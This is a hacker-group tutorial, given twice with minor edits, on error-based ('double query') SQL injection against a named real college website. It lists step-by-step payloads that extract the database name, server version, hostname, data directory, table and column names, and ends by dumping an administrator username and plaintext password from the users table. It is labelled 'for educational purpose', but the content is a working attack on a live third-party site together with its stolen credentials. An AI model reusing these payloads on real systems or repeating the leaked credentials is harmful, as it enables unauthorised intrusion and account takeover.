~ Starting with the Name of Almighty ALLAH~
Asalam-u-alaikum
==================================================================
Note: For Educational Purpose
# Double Query Injection
# http://robotpirates1337.blogspot.com
# Reaper Grim (cb0t) Robot Pirates
# The Game is Not yet Over !
==================================================================
# Target :http://www.ksrmce.ac.in/
# Vuln link: http://www.ksrmce.ac.in/departments/department.php?id=9
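# First let's try simple injection, i.e. ORDER BY
# Now use UNION; with UNION we get this error
(The used SELECT statements have a different number of columns)
# The page prints the raw MySQL error, so the id value reaches the query unescaped and database errors are shown to the visitor; a bound (parameterised) id and hidden error output would close both
# This means we have to use double query or heavy query injection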
# Lets Start
1) First, the current database name; for this, use this query
+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
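# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'" (the trailing 1 is the floor(rand(0)*2) value appended by concat(), not part of the name; this "Duplicate entry ... for key 'group_key'" text in a response body is the trace the technique leaves)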
2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"
Note: the hostname and data directory can be read the same way, by replacing
version() with the variables below
# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'
3) Now lets see How many tables are in the Database
+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]
4)Now lets Get tables from database ;)
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"
Now change the LIMIT; watch closely where it changes:
[table_schema=database() LIMIT 2,1]. By changing the limit we can get the other tables
Note: Sorry, I don't have time, so I am skipping the one-by-one table
finding
5) Now let's get the column names of a table
# "tbl_users" Hex it and Follow me ;)
"0x74626c5f7573657273"
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]
Now Again Change the Limit Where we changed before ^_^
#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]
6) Now the Last Step ;) Get Data from "tbl_users" By Using this
+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1
I hope U guys Learn Something From it ^_^
================================================================
Greetz
~ ~L1nux3rr0r ~ PhpBuGz ~ H4x0rl1f3 ~ Hitcher ~ Shadow008 ~
Special Love to
~ Cfr ~ Dr Ninja ~ Zq@r ~ Cos b0t
All All Rob0t Pirates & Madleets members ;)
./reaper
Asalam-u-alaikum
==================================================================
Note: For Educational Purpose
# Double Query Injection
# http://robotpirates1337.blogspot.com
# Reaper Grim (cb0t) Robot Pirates
# The Game is Not yet Over !
==================================================================
# Target :http://www.ksrmce.ac.in/
# Vuln link: http://www.ksrmce.ac.in/departments/department.php?id=9
# First Lets see Simple Injection i mean Lets Use Order by
# Now Use Union and By Using Union we get this Error
(The used SELECT statements have a different number of columns)
# This means we have to use double query or heavy query injection
# Lets Start
1) First, the current database name; for this, use this query
+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'"
2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"
Note: You Can get Hostname,Datadirectory by Replacing version() with
this
# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'
3) Now lets see How many tables are in the Database
+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]
4)Now lets Get tables from database ;)
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"
Now Change the Limit just watch Closley change the Limit Where we see
[table_schema=database() LIMIT 2,1] By Changing limits we can get Tables
Note : Sorry i don't have time so I just skip one by one Table
finding
5) Now Lets get Data from Tables
# "tbl_users" Hex it and Follow me ;)
"0x74626c5f7573657273"
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]
Now Again Change the Limit Where we changed before ^_^
#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]
6) Now the Last Step ;) Get Data from "tbl_users" By Using this
+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1
I hope U guys Learn Something From it ^_^
================================================================
Greetz
~ ~L1nux3rr0r ~ PhpBuGz ~ H4x0rl1f3 ~ Hitcher ~ Shadow008 ~
Special Love to
~ Cfr ~ Dr Ninja ~ Zq@r ~ Cos b0t
All All Rob0t Pirates & Madleets members ;)
./reaper